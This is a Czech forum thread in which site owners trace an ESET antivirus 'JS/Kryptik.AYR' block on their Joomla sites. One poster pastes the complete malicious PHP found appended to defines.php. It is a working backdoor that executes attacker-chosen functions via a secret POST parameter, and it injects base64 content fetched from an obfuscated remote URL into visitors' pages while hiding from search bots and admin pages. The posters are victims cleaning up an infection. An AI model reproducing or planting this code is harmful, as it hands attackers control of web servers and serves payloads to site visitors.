ESET NOD32 v8 + WIN 7 + MSIE = blokace webu

[Ipanema]

Dobrý den, ahoj,

nepoužívám Antivirus ESET NOD32, ale mám problém u konkrétních webů při přístupu na ně. Přístup je vždy zablokován a web prý obsahuje hrozbu: "JS/Kryptik.AYR trojský kůň".
Na svém PC problém nemám (a to jen pro to, že nepoužívám zmíněný antivir, jinak mám také WIN7 a MSIE také), ale mám tuto informaci od majitelů webů, kteří na svoje stránky chtějí přistoupit. Pokud mají na PC: X) WIN 7, Y) antivir NOD32 ve verzi 8 a Z) prohlížeč Internet Explorer, tak se web nezobrazí.
Pokud jednu z podmínek X, Y, Z neudělají, web jede normálně. Čili třeba prohlížeč Chrome, Edge, WIN10, jiný antivir, ...

Kontaktoval jsem webhosting. Technické odd. vč. hlavního programátora vše prověřili, žádný ze souborů v databází a na kompletním FTP neobsahuje vir/trojského koně.
Kontaktoval jsem technické odd. spol ESET, jestli mi to můžou prověřit, zda není učiněna nějaká online blokace u nich. Odpověď byla, že vyzkoušeli "...kde je nainstalovaný ESET NOD32 Antivirus 9 a také na stroji, kde je nainstalovaná firemní verze ESET Endpoint Security 6. Ani v jedném případě nedochází k blokování stránek.". Při mojí odpovědi, že je blokace pouze (pravděpodobně) jen u uživatelů s vezí 8 jejich programu, se mi již odpovědi nedostalo. Tím pádem to zkouším zde, než začnu dělat osvětu jiným lidem, že mají upgradovat produkty spol. ESET ve svém PC na vyšší verzi.

Nemám žádný log a pochybuji, že mi ho někdo bude přes půl republiky dělat. Chyba je odsledovaná u třech různých lidí, ve třech různých koutech ČR, jistě i s jinou konfigurací OS Windows a jinou IP adresou.

Pokud by byl zde někdo od té dobroty a vyzkoušel to také a případně odhalil kde se skrývá chyba, budu opravdu rád.

Weby:

Kód: Vybrat vše

www.ipanema.cz + www.nordcoursing.cz + www.ajajidelna.cz + www.5e.cz/veterina

[mskarka]

Mám stejný problém na svém webu, který běží pod joomlou 3.1.5
Problém se objevil dnes okolo jedné hodiny. Zatím všechny snahy žádný vadný soubor neobjevily. problém se objevuje pouze pod IE s Eset, Chrome i FireFox s Eset trojana nezaregistrují.
Eset Endpoint Security verze 6.2.2033.1

[Ipanema]

O jaký web se jedná? Klidně sem nebo do SZ. Napíšu to do ESETu.
Podle mě v Joomle to nebude. Mám na Joomle weby s verzí 2,5 i 3,4 a některý se chová tak a jiný jinak....

Díky.

[mskarka]

No snažil jsem se tu přijít jak se tu posílají SZ, nepřišel Tak píšu takto

[Ipanema]

Vidím Stejná vlastnost jako u mých webů.
Odesílám Vaši adresu nyní do ESETu, ať se s tím poperou u profesionálů.

[mskarka]

A jen tak pro zajímavost, Vaše weby beží pod joomlou?
Já měl totiž strach aby to nesouviselo s tímhle. Zrovna dneska jsem chtěl updatovat

[Ipanema]

Pokud to s tím souvisí, nejede polovina webů světa?
Vyzkouším update na 3.4.6 na jednom z webů a napíšu jestli se něco změnilo.

[Ipanema]

Ne, prý to nepomohlo.
Joomla aktualizována na jednom z webů, v PC proběhl Ccleaner, restart a otevření MSIE. Bez jakékoliv známky určující jiný stav

[mskarka]

Tak budeme muset asi zatlačit na ESET a počkat co nám k tomu řekne :-/

[Ipanema]

Jak příjde nějaká odpověď, můžu sem napsat poznatek. Zatím to ale vypadá, že řeší důležitější věci a odpovědi. Bez urážky.
Je ale možné, že musím být vlastníkem licence, aby mi odpověděli víc než "zkusili jsme to a u nás to jede na devítkové verzi antiviru OK".

[mskarka]

My máme ve firmě ESETy nakoupené, takže jsem taky zadal dotaz a uvidíme jak se nám budou věnovat

[Ipanema]

Už je zde...

Dobrý den,

webové stránky jsem testovala na stanicích s programy ESET Smart Security 8 a ESET NOD32 Antivirus 8. V obou případech došlo k blokaci. Na stanicích s ESET Smart Security 9, ESET NOD32 Antivirus 9 a ESET Endpoint Security 6 k blokování nedošlo. Vše jsem předala kolegům do virové laboratoře na Slovensku. Prosím o strpení. Řeší nyní mnoho případů, takže zatím k tomu Vašemu nemám bližší informace. Jakmile je získám, budu Vás kontaktovat.
Děkuji za pochopení.

[mskarka]

Tak.. hned jsem klidnější Určitě i naši zákazníci až je to potká

[mskarka]

Tak já jsem svůj trojský vir vyřešil... Ehm Ehm...
Absolutně to ale nesouviselo s řešením viru. Ještě se mi a webu zobrazovala další chyba (viz tento obrázek). Tudíž jsem se pustil do její řešení. Zjistil jsem že umazáním mezery na konci ve 3 souborech (configuration.php, seassion.php a defines.php) vyřešilo zobrazování chyby a vyřešení chyby vyřešilo trojského koně

Jsem z toho jelen.

[Ipanema]

Zkusil jsem to u jednoho webu. Asi to sem už nepatří, ale napíšu to, pro další....
V souboru configuration.php a seassion.php žádnou mezeru na konci nemám. V souboru defines.php jsem umazal "za tvým posledním středníkem" (od něho až do konce) ze screenu toto:

Kód: Vybrat vše

//istartn

function is_valid_url(&$url)
{
    if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m))
        return false;
    $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6];
    return true;
}

function request_url_data($url) {

    if(!is_valid_url($url))
        return false;

    $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_HTTPHEADER, array(
            'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"],
            'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"],
            'Referer: ' . $site_url,
        ));
        $response = trim(curl_exec($ch));
    } elseif (function_exists('fsockopen')) {
        $m = parse_url($url);
        if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) {
            fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" .
                'Host: ' . $m['host'] . "\r\n" .
                'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" .
                'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" .
                    'Referer: ' . $site_url . "\r\n" .
                    'Connection: Close' . "\r\n\r\n");
            $response = '';
            while (!feof($fp)) {
                $response .= fgets($fp, 1024);
            }
            list($headers, $response) = explode("\r\n\r\n", $response);
            fclose($fp);
        }
    } else {
        $response = 'curl_init and fsockopen disabled';
    }
    return $response;
}

function decrypt_url($encrypted_url)
{
    $encrypted_url = base64_decode($encrypted_url);
    $url = '';
    for ($i = 0; $i < strlen($encrypted_url); $i++)
    {
        $url .= chr(ord($encrypted_url[$i]) ^ 3);
    }
    return $url;
}
error_reporting(0);
$_passssword = 'b01692be46d146416762ae0ed788ff77';

$p = $_POST;

if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');




if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
    echo('<!--checker_start ');
    $tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
    echo(substr($tmp, 50));
    echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
    if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
        $bad_url = true;
        break;
    }
}

$cookie_name = '_PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
//    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
//        $url = base64_decode('a3d3czksLDszLTIwMy00NS0xMjEsYW9sZCw8d2xubnoldnduXHBsdnFgZj4xNDc0NjkwNTIwMTc5NjU2');
    $url = decrypt_url('a3d3czksLDszLTIwMy00NS0xMjEsYW9sZCw8d2xubnoldnduXHBsdnFgZj4xNDc0NjkwNTIwMTc5NjU2');
    $code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
    if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
        $echo_done = true;
        print $decoded;
    }
}//iendn

A také web běží. Vyzkouším případně na dalším webu.
Poklona za obejítí problému.
Uvidíme jak to půjde na dalších webech.